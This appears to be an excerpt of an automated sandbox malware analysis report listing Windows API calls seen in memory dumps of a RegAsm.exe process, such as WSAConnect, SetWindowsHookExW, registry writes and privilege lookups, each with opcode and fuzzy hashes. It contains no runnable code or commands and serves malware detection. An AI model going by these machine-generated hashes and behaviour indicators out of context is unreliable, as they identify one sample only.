                                  • Instruction ID: 7bbba61d5c1c6760eda02b3267a9893641f90d366eb82fdd7a798f6b0b825f8e
                                  • Opcode Fuzzy Hash: 8eb49019f4dab847a834c9bdf2d3b9fd2182495f752f50eb9c8a7969f6d1812a
                                  • Instruction Fuzzy Hash: EF21DEB1500344AFE721DF95DC84B96FBE8EF48320F04845EED898B252C376B908CB62
                                  Uniqueness

                                  Uniqueness Score: 0.34%

                                  APIs
                                  • SetFileAttributesW.KERNEL32(?,?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1DB1AECB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 2e7e26094bf83ddb6cd41b85fc59f33e959f558d0c0ac24f9015e979f48f29ee
                                  • Instruction ID: 4700ac8af9532c7fc356d135f2ea0b90b3bffe791d69ee83a69521e6569cd781
                                  • Opcode Fuzzy Hash: 2e7e26094bf83ddb6cd41b85fc59f33e959f558d0c0ac24f9015e979f48f29ee
                                  • Instruction Fuzzy Hash: 3321A1B55093C45FDB12CB29DC95B92BFE8EF02314F0980EAE885CF253D325A949CB61
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  APIs
                                  • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 204F2336
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Connect
                                  • String ID:
                                  • API String ID: 3144859779-0
                                  • Opcode ID: 4958234c359bb24a55bbdf530ea39d4b02425c1e18cdb989504f36c832963142
                                  • Instruction ID: 79d37ee1658dab2c7ab2f9f3e591e746fc7b7b4f37d021209bf562e4b16170bd
                                  • Opcode Fuzzy Hash: 4958234c359bb24a55bbdf530ea39d4b02425c1e18cdb989504f36c832963142
                                  • Instruction Fuzzy Hash: D521A171409384AFD722CF65C884A52FFF4EF06210F0984DEED858B262D375A958CB61
                                  Uniqueness

                                  Uniqueness Score: 0.55%

                                  APIs
                                  • RegSetValueExW.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 1DB1A9EC
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: d1d8bd8c8f9a2c51afb8e2fb979acdfeddd84498f95d4603a2bef805a66d909e
                                  • Instruction ID: 0dc7f41342cb92c424921b4d4ff348d4226a8ebaf7c416b418ce805fc9c284da
                                  • Opcode Fuzzy Hash: d1d8bd8c8f9a2c51afb8e2fb979acdfeddd84498f95d4603a2bef805a66d909e
                                  • Instruction Fuzzy Hash: 7911BEB2600640AFE721DF11DC85BA7FBECEF44610F04855AED469B252D670F949CAB2
                                  Uniqueness

                                  Uniqueness Score: 0.15%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 204F10B0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: a2864ca7ee8a34bf6e3fd36468d30d944c2d94371bf9d36c78503302e8568d2e
                                  • Instruction ID: ad0842c2da3ba0ce0a653936f6209e4305a44009cae3e23df3aaeb9cc4d13e69
                                  • Opcode Fuzzy Hash: a2864ca7ee8a34bf6e3fd36468d30d944c2d94371bf9d36c78503302e8568d2e
                                  • Instruction Fuzzy Hash: A611B172600244AFE720DF55CC88FA6FBE8EF44620F04C55AE945DB662DB78E944CA72
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • EnumWindows.USER32(?,00000EB4,?,?), ref: 1DB1A1BD
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: EnumWindows
                                  • String ID:
                                  • API String ID: 1129996299-0
                                  • Opcode ID: 269e3dab72fdacccc38108b433bdc01adee94e922edb009106fd4fda76a325d8
                                  • Instruction ID: 02379a2367e231b45952a62ddd58e83a5e5286438e9151b4b86f93212a1a587f
                                  • Opcode Fuzzy Hash: 269e3dab72fdacccc38108b433bdc01adee94e922edb009106fd4fda76a325d8
                                  • Instruction Fuzzy Hash: E511AF719093806FD311CB25CC45B66FFB8EF86620F08819EED488B682D334B915CBA2
                                  Uniqueness

                                  Uniqueness Score: 0.22%

                                  APIs
                                  • GetProcessTimes.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 204F18A5
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ProcessTimes
                                  • String ID:
                                  • API String ID: 1995159646-0
                                  • Opcode ID: d5048103537f2fda4bf5dcbbd17aeb68527f2f75b0c6a74067aa7a09e8c24829
                                  • Instruction ID: db27a1872251b9bdb3fb0ed125feffa5be82985943e3ed7a13dd0449a484e3b9
                                  • Opcode Fuzzy Hash: d5048103537f2fda4bf5dcbbd17aeb68527f2f75b0c6a74067aa7a09e8c24829
                                  • Instruction Fuzzy Hash: 6D11E272500344AFE721DF95DC88FAAFBA8EF44720F14C46AE945CB262D779A904CB71
                                  Uniqueness

                                  Uniqueness Score: 0.34%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 204F295A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 0d0e3ef00755413f0e5a06d7b215568d33e0398b055258a8f853b971d9a0807b
                                  • Instruction ID: 5f609daf5406a77846829e8b0f52f002f0cac974ec5c597424f1a5722c7b3e8e
                                  • Opcode Fuzzy Hash: 0d0e3ef00755413f0e5a06d7b215568d33e0398b055258a8f853b971d9a0807b
                                  • Instruction Fuzzy Hash: CD116DB26053849FD711CF65DD89B57BFE8EF06220F0884AAED85CB252D374E908CB61
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • WriteFile.KERNEL32(00000000,00F004A2,?,?,00000000,00000000,?,?,40000000,00000002,00000000,00000002,00000100,00000000,00F01DB9,?), ref: 00F01E14
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: e06e6225796106c020deae872fc385efe68ab222df04d69fcdbd4d0f591d42f9
                                  • Instruction ID: d8beddd7ce9bb41cf11e2a2d3195b11327e6f65d70d77092ce820cd65c3ca9f8
                                  • Opcode Fuzzy Hash: e06e6225796106c020deae872fc385efe68ab222df04d69fcdbd4d0f591d42f9
                                  • Instruction Fuzzy Hash: C611D2307843057AFB309A24CC1BFEB3656AF80BA0F544519FE94AA1D2E7E5AC81F651
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • WriteFile.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 1DB1AE09
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: 06d0dde877975f60af403596c4ee6c60639142255b1236b4b48baa153b355044
                                  • Instruction ID: fc81642a18d94be7f3a08c39faa3b3e1e233e7732c728868e93387c8bcfa91ad
                                  • Opcode Fuzzy Hash: 06d0dde877975f60af403596c4ee6c60639142255b1236b4b48baa153b355044
                                  • Instruction Fuzzy Hash: 7711C172500240AFE722DF55DC84BA7FBE8EF44720F14845AE9499B252C775A505CBB2
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • LoadLibraryA.KERNEL32(?,00000EB4), ref: 1DB1B8BF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 1bd9cb875b01bbbf98856ac2b51c9518df1fd06086008ef99ea965aac1988446
                                  • Instruction ID: d56cbcf1fa8897478f81ae33b15757aaf18fca0296734ad2e09f6a08a1970197
                                  • Opcode Fuzzy Hash: 1bd9cb875b01bbbf98856ac2b51c9518df1fd06086008ef99ea965aac1988446
                                  • Instruction Fuzzy Hash: FE114871500340AFF721DF11DC85BA6FB98DF41B20F04C099ED495F281C6B4A648CA66
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • CopyFileW.KERNEL32(?,?,?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 204F01A6
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CopyFile
                                  • String ID:
                                  • API String ID: 1304948518-0
                                  • Opcode ID: 9b6ed684b9fcd9380fff5eb70ccd4768c729e739e77ce32dcfd607005aa2706c
                                  • Instruction ID: 722fc82f475fd1318df2ad178e21e4163cc5c8b860bf9ddd2ef053e639a4f2c3
                                  • Opcode Fuzzy Hash: 9b6ed684b9fcd9380fff5eb70ccd4768c729e739e77ce32dcfd607005aa2706c
                                  • Instruction Fuzzy Hash: F5117C716002449FEB10CF69DD89B56FBE8EB54320F18C4AADD49CB342D67AE904CA62
                                  Uniqueness

                                  Uniqueness Score: 0.24%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 204F295A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 9b6ed684b9fcd9380fff5eb70ccd4768c729e739e77ce32dcfd607005aa2706c
                                  • Instruction ID: c6f01500ddfed3d85060012ab4e43a553411bc94112569104cb8668b94c9ba45
                                  • Opcode Fuzzy Hash: 9b6ed684b9fcd9380fff5eb70ccd4768c729e739e77ce32dcfd607005aa2706c
                                  • Instruction Fuzzy Hash: AE1130B17002459FDB50DF59D989B56FBE8EF04220F08C4AADD49CB352D679E904CAA1
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • CreateDirectoryW.KERNEL32(?,?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1DB1BCBF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateDirectory
                                  • String ID:
                                  • API String ID: 4241100979-0
                                  • Opcode ID: 708e2f9666d751625b3cb3cc5e537c5b47c116522f66bb33636386438bee83de
                                  • Instruction ID: 913c8da3bb5133763dff4181c76a4eac1cc590a54892962cbfd9990515edab26
                                  • Opcode Fuzzy Hash: 708e2f9666d751625b3cb3cc5e537c5b47c116522f66bb33636386438bee83de
                                  • Instruction Fuzzy Hash: 7511C4716002819FE700DF29EC85B56FBD8EF05620F08C4AADC0ACF242EB75E504CB66
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  APIs
                                  • GetFileType.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 1DB1AD3D
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID:
                                  • API String ID: 3081899298-0
                                  • Opcode ID: d45275a22f2a5983aa33e7a1181dc5726a9a2130910659289ba82ce3500a9778
                                  • Instruction ID: 35e77528113cf17f522bc7ce7b5cfa75e3e78ece26aa9b936d73a9f3aca02d1b
                                  • Opcode Fuzzy Hash: d45275a22f2a5983aa33e7a1181dc5726a9a2130910659289ba82ce3500a9778
                                  • Instruction Fuzzy Hash: E50122B1500640AFE711DF12DC84BA7FBE8DF40B21F04C09AED499F252C674B608CA72
                                  Uniqueness

                                  Uniqueness Score: 0.07%

                                  APIs
                                  • K32EnumProcesses.KERNEL32(?,?,?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 204F2C4E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: EnumProcesses
                                  • String ID:
                                  • API String ID: 84517404-0
                                  • Opcode ID: 26d5ffcc4d0a59731e11da0aeef13865bcb6ea46776b51c29a9acfd9d96656eb
                                  • Instruction ID: dbe32639736211a4be3cb0309bcadd350fa2e1fb0464fa5bdcdd494919459694
                                  • Opcode Fuzzy Hash: 26d5ffcc4d0a59731e11da0aeef13865bcb6ea46776b51c29a9acfd9d96656eb
                                  • Instruction Fuzzy Hash: 7B1161756002889FD710CF99D989B5AFBE4EF44220F08C4AADD49CB352D779E944CBA2
                                  Uniqueness

                                  Uniqueness Score: 0.51%

                                  APIs
                                  • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 204F2336
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Connect
                                  • String ID:
                                  • API String ID: 3144859779-0
                                  • Opcode ID: cf36fd75d5656498df726f9756d986f06dec59af26dc4f9853e476d3b9cf2826
                                  • Instruction ID: 5a53cad7b63ee623f1ac527f66cfccf90da3ea2076cbf41b4d591e01a85d6082
                                  • Opcode Fuzzy Hash: cf36fd75d5656498df726f9756d986f06dec59af26dc4f9853e476d3b9cf2826
                                  • Instruction Fuzzy Hash: 631170715007449FDB21CF95D988B56FBE4EF04210F08C5AADD498B612D339E919DFA1
                                  Uniqueness

                                  Uniqueness Score: 0.55%

                                  APIs
                                  • SetKernelObjectSecurity.KERNELBASE(?,?,?), ref: 204F20CA
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: KernelObjectSecurity
                                  • String ID:
                                  • API String ID: 3015937269-0
                                  • Opcode ID: 8d1a1085fc5d9a0eb5438eb75d41b1c347545f76cb7d46a10ea2737c2ab119d1
                                  • Instruction ID: 4cf1c3cd71cc8d9123710ff54b177a478142615b985a307558a9b743c1f46a97
                                  • Opcode Fuzzy Hash: 8d1a1085fc5d9a0eb5438eb75d41b1c347545f76cb7d46a10ea2737c2ab119d1
                                  • Instruction Fuzzy Hash: E011A1726006449FD710CF55D988B56FBE4EF04220F08C4AADE09CB252D739E944CBA2
                                  Uniqueness

                                  Uniqueness Score: 1.51%

                                  APIs
                                  • SetFileAttributesW.KERNEL32(?,?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1DB1AECB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: e77c0630a594d0e8f449aa72601250bf594c3c84bb811911fd03d7b9557d2475
                                  • Instruction ID: 21bc60c2e5aae0b999efca3466451e8e596b06187da3e30934381634326210d8
                                  • Opcode Fuzzy Hash: e77c0630a594d0e8f449aa72601250bf594c3c84bb811911fd03d7b9557d2475
                                  • Instruction Fuzzy Hash: 0101D272A003809FDB10CF29E884766FBE8EF00220F08C4AADC09CF246D735E405CE62
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  APIs
                                  • SetErrorMode.KERNEL32(?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1DB1A308
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 8e4947d7ba929e8a5d4a02bc54a147f1d28216c3a2c89d6cccddf955bafea802
                                  • Instruction ID: 19bc70b65ec32d4b5664cd029d7eea78209a5ed184a50ed7759388d0d07a6973
                                  • Opcode Fuzzy Hash: 8e4947d7ba929e8a5d4a02bc54a147f1d28216c3a2c89d6cccddf955bafea802
                                  • Instruction Fuzzy Hash: 73018075509384AFD711CF15EC84B62FFA8EF46620F0880DAED899F252D375A918CB72
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • DeleteFileW.KERNEL32(?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1DB1BF54
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 339b465c02c3cd9ca619fbeb7846403b8f9291058b564bfac5ed011e9fb6237c
                                  • Instruction ID: 9603b50b84ddccd4f8213672f5a296fd98129dce08731a0095783441ec8a03c0
                                  • Opcode Fuzzy Hash: 339b465c02c3cd9ca619fbeb7846403b8f9291058b564bfac5ed011e9fb6237c
                                  • Instruction Fuzzy Hash: AC01B175A002809FD710CF29EC85756FBA8EF01620F08C0AADC0ACF246D775E404CF62
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • EnumWindows.USER32(?,00000EB4,?,?), ref: 1DB1A1BD
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: EnumWindows
                                  • String ID:
                                  • API String ID: 1129996299-0
                                  • Opcode ID: 3f3a3ee5dec43c3cd9d8d013ea64a7edc01cbd5d924b5ceea446236fc4df42d7
                                  • Instruction ID: d01ae29eb2dd1dc41fd7904de6e347093cd4cd31b74d9dae7070e1acc490b166
                                  • Opcode Fuzzy Hash: 3f3a3ee5dec43c3cd9d8d013ea64a7edc01cbd5d924b5ceea446236fc4df42d7
                                  • Instruction Fuzzy Hash: B40171B1900200AFD310DF16DC46B26FBB8EB85A20F14815AED089B641D775F915CAE5
                                  Uniqueness

                                  Uniqueness Score: 0.22%

                                  APIs
                                  • FormatMessageW.KERNEL32(?,00000EB4,?,?), ref: 204F28BA
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FormatMessage
                                  • String ID:
                                  • API String ID: 1306739567-0
                                  • Opcode ID: 76d3306ee32872b23c5b0e02e0e04a43a408f17c9caa00f5105c2c4943c90adf
                                  • Instruction ID: 394e3852cb39fafaad3a992e261c37bc749047ec38d6e953c11bc4d8c93dca62
                                  • Opcode Fuzzy Hash: 76d3306ee32872b23c5b0e02e0e04a43a408f17c9caa00f5105c2c4943c90adf
                                  • Instruction Fuzzy Hash: DC0171B1900200AFD350DF16DC46B26FBB8EB85A20F14815AED089B641D775F915CBE5
                                  Uniqueness

                                  Uniqueness Score: 0.07%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1DB1AADA
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: f222a3cc9b3a7691fb58d1a6c67bb67733f62c21c595f254473a2d22bb70b4aa
                                  • Instruction ID: 242b839c9d376d043e74c1358e9fbbb51caeda735a75c2086cb923d9369db4c4
                                  • Opcode Fuzzy Hash: f222a3cc9b3a7691fb58d1a6c67bb67733f62c21c595f254473a2d22bb70b4aa
                                  • Instruction Fuzzy Hash: D601A271900200ABD310DF16CC42B26FBB8FB89A20F14815AED084B741D371F925CAE5
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • SetWindowsHookExW.USER32(?,00000EB4,?,?), ref: 204F063E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: HookWindows
                                  • String ID:
                                  • API String ID: 2559412058-0
                                  • Opcode ID: 8c6db00ba2797d3492a0f9e85f2495ef9468f8e9f96edbe90d2016aef35706eb
                                  • Instruction ID: ed917a8fa83208366455064f70b628791f23fb91e7c004883cfa0d2751860305
                                  • Opcode Fuzzy Hash: 8c6db00ba2797d3492a0f9e85f2495ef9468f8e9f96edbe90d2016aef35706eb
                                  • Instruction Fuzzy Hash: 98016275900200ABD350DF16DC46B26FBB8FB89A20F14815AED085B741D775F925CBE5
                                  Uniqueness

                                  Uniqueness Score: 0.60%

                                  APIs
                                  • LoadLibraryA.KERNEL32(?,B769339E,?,00F00A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00F004BD,00000000), ref: 00F0822B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 3b7338d16ccbe36a966adfdfb8fe2abe7cb7d236e4ce9f9e9eefb0cd39a519a0
                                  • Instruction ID: 80d8cc419a257307ca12b37514baaec3d38d1a3dfd0f952b0c9d5a42ecca25ab
                                  • Opcode Fuzzy Hash: 3b7338d16ccbe36a966adfdfb8fe2abe7cb7d236e4ce9f9e9eefb0cd39a519a0
                                  • Instruction Fuzzy Hash: D7F0E2D0C4060B34EF203A241E26BBF2A229F517F4F60412CFDC18508A8F29C4473011
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • SetErrorMode.KERNEL32(?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1DB1A308
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 0843463a9009029311d33d4125d96fbb523ffedeff30c6cebe34a03d41bdbae2
                                  • Instruction ID: ea8f69edf67115ec1343ab6464fcb5db310f30b6ad2392763114b25e353da595
                                  • Opcode Fuzzy Hash: 0843463a9009029311d33d4125d96fbb523ffedeff30c6cebe34a03d41bdbae2
                                  • Instruction Fuzzy Hash: ACF0DC345042809FD711DF05E889B62FBE0EF00620F08C09ACD4A4F206C279A909CE62
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • CreateFileW.KERNEL32(?,?,?,?,000000C0,?,?,00000000,?,00F004BD,00000000), ref: 00F0A7D8
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 79751bbd70b7e6565d9dd082c8a01e4ceabf00169ce343474bf4350be8c7e97c
                                  • Instruction ID: 980681b9e3e496996140de5c60e8fc4e3326a1c859d119ab861cddf220ce94b5
                                  • Opcode Fuzzy Hash: 79751bbd70b7e6565d9dd082c8a01e4ceabf00169ce343474bf4350be8c7e97c
                                  • Instruction Fuzzy Hash: DBD01235B043024EEB1DEE34C1D61693777AEC5364798C008CA0106454F2276C89F762
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • RegSetValueExA.KERNEL32(?,00F068C2,00000000,00000001,?,?,?,?,?,?,00F01137,?,?,00000000,00000000,000000FF), ref: 00F01831
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 1beea27a6b604f50d0e8ce8ec9e9f961666e1f60683b56bffe492cc2d8f0247d
                                  • Instruction ID: 9428a53115b5da7353f12e8d7339dafa9696524181653009d336d13ff4d8f942
                                  • Opcode Fuzzy Hash: 1beea27a6b604f50d0e8ce8ec9e9f961666e1f60683b56bffe492cc2d8f0247d
                                  • Instruction Fuzzy Hash: D6C012706407067AF61005544C2AFD36A579F117B0F900305BE75500E4975348508524
                                  Uniqueness

                                  Uniqueness Score: 0.15%

                                  APIs
                                  • GetLongPathNameW.KERNEL32(?,00F004A2,00000200,00F018B8,?,?,?,?,00F06953,00F06918,?,?,00F011DE,00000000,000000FF,00000007), ref: 00F07C4D
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LongNamePath
                                  • String ID:
                                  • API String ID: 82841172-0
                                  • Opcode ID: ac5aae0dad25ab8551f9d779720122a49b54a3f9a577bd216295e5e63ae69157
                                  • Instruction ID: ef09fb0b1322a84ad82ab9713ca7fd962ccacd7908c5b2b7525d7fe1cb2f05ec
                                  • Opcode Fuzzy Hash: ac5aae0dad25ab8551f9d779720122a49b54a3f9a577bd216295e5e63ae69157
                                  • Instruction Fuzzy Hash: 4DC012743043006BE710891089C4B5F625DAB90751F10C608F9A6851C1CB3088409621
                                  Uniqueness

                                  Uniqueness Score: 0.11%

                                  APIs
